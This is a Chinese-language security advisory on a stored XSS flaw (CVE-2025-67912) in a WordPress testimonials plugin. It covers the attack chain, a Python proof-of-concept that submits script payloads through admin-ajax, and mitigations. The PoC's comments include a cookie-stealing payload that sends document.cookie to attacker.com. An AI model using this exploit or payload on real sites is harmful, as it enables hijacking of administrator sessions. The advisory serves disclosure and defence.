CVE-2025-67912: WordPress Stars Testimonials插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-67912

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

WordPress Stars Testimonials with Slider and Masonry Grid插件

漏洞概述

CVE-2025-67912是WordPress插件Stars Testimonials with Slider and Masonry Grid中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞由Patchstack团队的安全研究人员发现（[email protected]），存在于插件的评论/评价提交功能中。由于插件对用户输入的净化和转义处理不当，攻击者可以在提交评价内容时嵌入恶意JavaScript脚本代码。这些恶意代码会被永久存储在数据库中，当其他管理员或用户在后台管理界面或前端页面查看这些评价时，恶意脚本将自动执行。由于该插件通常用于展示网站的用户评价和推荐内容，攻击者可以利用此漏洞窃取管理员会话Cookie、劫持管理员账户、执行任意管理操作，甚至进一步渗透整个WordPress站点。此漏洞的CVSS评分为6.5，属于中等严重程度，但考虑到其存储型特性和对WordPress站点的潜在影响，仍需及时修复。

技术细节

该存储型XSS漏洞存在于Stars Testimonials插件的评论提交和展示模块中。漏洞的根本原因在于插件在处理用户提交的姓名、评价内容、评分等字段时，未能对特殊字符进行充分的HTML实体转义或输入验证。攻击者可以在评价表单的文本输入框中注入包含<script>标签或事件处理器（如onerror、onload等）的JavaScript代码。当这些包含恶意代码的评价被管理员审核并保存到数据库后，每次页面加载或后台访问相关评价列表时，浏览器都会执行这段恶意脚本。由于WordPress插件的管理后台通常具有较高的权限，攻击者可以通过窃取管理员Cookie或利用已建立的会话执行进一步的攻击，如上传恶意插件、修改站点内容或获取服务器文件系统访问权限。攻击的利用需要低权限用户账号（PR:L），但攻击复杂度较低（AC:L），且需要一定的用户交互（UI:R），如管理员查看相关页面。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标WordPress网站并确认安装了Stars Testimonials插件，版本<=3.3.4

STEP 2

步骤2

注册低权限账户：攻击者注册一个订阅者(subscriber)级别的WordPress用户账户

STEP 3

步骤3

注入恶意代码：利用插件的评价提交功能，在姓名、公司名称或评价内容字段中注入XSS payload，如<script>alert(document.cookie)</script>

STEP 4

步骤4

持久化存储：恶意脚本代码被保存到数据库中，成为存储型XSS

STEP 5

步骤5

诱导访问：等待管理员或后台用户访问包含恶意评价的页面（前端展示或后台管理列表）

STEP 6

步骤6

脚本执行：当受害用户访问页面时，浏览器解析并执行存储的恶意JavaScript代码

STEP 7

步骤7

会话劫持：恶意脚本窃取用户Cookie或执行管理员操作，攻击者利用窃取的凭证进行进一步渗透

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys
from bs4 import BeautifulSoup

# CVE-2025-67912 PoC - Stored XSS in WordPress Stars Testimonials Plugin
# Target: WordPress site with Stars Testimonials plugin <= 3.3.4

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "subscriber_user"
PASSWORD = "user_password"

def get_nonce(login_page_content):
    """Extract WordPress nonce from login page"""
    soup = BeautifulSoup(login_page_content, 'html.parser')
    nonce_input = soup.find('input', {'id': '_wpnonce'})
    if nonce_input:
        return nonce_input.get('value')
    return None

def exploit_stored_xss():
    """Exploit the stored XSS vulnerability"""
    session = requests.Session()
    
    # Step 1: Login to WordPress
    login_url = f"{TARGET_URL}/wp-login.php"
    login_page = session.get(login_url)
    nonce = get_nonce(login_page.text)
    
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        '_wpnonce': nonce,
        'redirect_to': f"{TARGET_URL}/wp-admin/"
    }
    
    login_response = session.post(login_url, data=login_data)
    if 'dashboard' not in login_response.url.lower() and 'wp-admin' not in login_response.url.lower():
        print("[-] Login failed!")
        return False
    
    print("[+] Login successful!")
    
    # Step 2: Submit testimonial with XSS payload
    # XSS payload: <script>alert(document.cookie)</script>
    # or more sophisticated: <img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>
    
    testimonial_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    
    xss_payload = "<script>alert('XSS CVE-2025-67912')</script>"
    # Alternative payload for cookie stealing:
    # xss_payload = "<img src=x onerror=\"fetch('https://attacker.com/steal?c='+btoa(document.cookie))\" />"
    
    testimonial_data = {
        'action': 'stars_testimonial_save',
        'testimonial_author': f"Test User {xss_payload}",
        'testimonial_content': f"Great product! {xss_payload}",
        'testimonial_rating': '5',
        'testimonial_company': f"Company Name {xss_payload}"
    }
    
    response = session.post(testimonial_url, data=testimonial_data)
    
    if response.status_code == 200:
        print("[+] Malicious testimonial submitted successfully!")
        print(f"[+] XSS payload will execute when admin views testimonials")
        return True
    else:
        print(f"[-] Failed to submit testimonial. Status: {response.status_code}")
        return False

if __name__ == "__main__":
    print("CVE-2025-67912 PoC - WordPress Stars Testimonials Stored XSS")
    print("=" * 60)
    exploit_stored_xss()

影响范围

Stars Testimonials with Slider and Masonry Grid <= 3.3.4

防御指南

临时缓解措施

在官方安全更新发布之前，可采取以下临时缓解措施：1) 临时禁用Stars Testimonials插件或使用替代插件；2) 启用WordPress评论审核功能，所有新提交的评价需管理员审核后才能公开显示；3) 部署Web应用防火墙（WAF）规则，拦截包含<script>标签或事件处理器属性的请求；4) 限制低权限用户提交评价的功能；5) 实施严格的Content Security Policy（CSP）头部配置，防止内联脚本执行。建议尽快应用官方发布的安全补丁，升级到插件的最新版本。